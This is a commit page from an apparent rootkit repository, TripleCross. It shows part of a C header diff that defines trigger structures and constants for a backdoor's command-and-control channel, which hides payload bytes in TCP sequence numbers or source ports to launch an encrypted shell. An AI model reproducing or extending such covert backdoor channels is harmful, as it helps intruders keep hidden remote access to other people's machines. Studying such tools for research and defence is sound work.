admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-25 02:43:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Added new hidden payload stream mode, now triggered using the source port. Fully integrated already, can select between that and seqnum in client. Both launch live encrypted shell via v3 backdoor

Browse Source
This commit is contained in:
h3xduck
2022-05-09 20:16:13 -04:00
parent ff0f34c6a4
commit 5320f35d01
11 changed files with 3447 additions and 2488 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
src/common/c&c.h
View File

@@ -26,11 +26,16 @@
#define CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL 2
//C&C V3 -- Distributed hidden payload in packet stream + encrypted shell
struct trigger_t {
struct trigger_32_t {
unsigned int seq_raw;
};
#define CC_STREAM_TRIGGER_PAYLOAD_LEN 12
#define CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES 4
struct trigger_16_t {
unsigned short src_port;
};
#define CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SEQ_NUM 12
#define CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM 4
#define CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT 12
#define CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT 2
#define CC_STREAM_TRIGGER_KEY_ENCRYPTED_SHELL CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL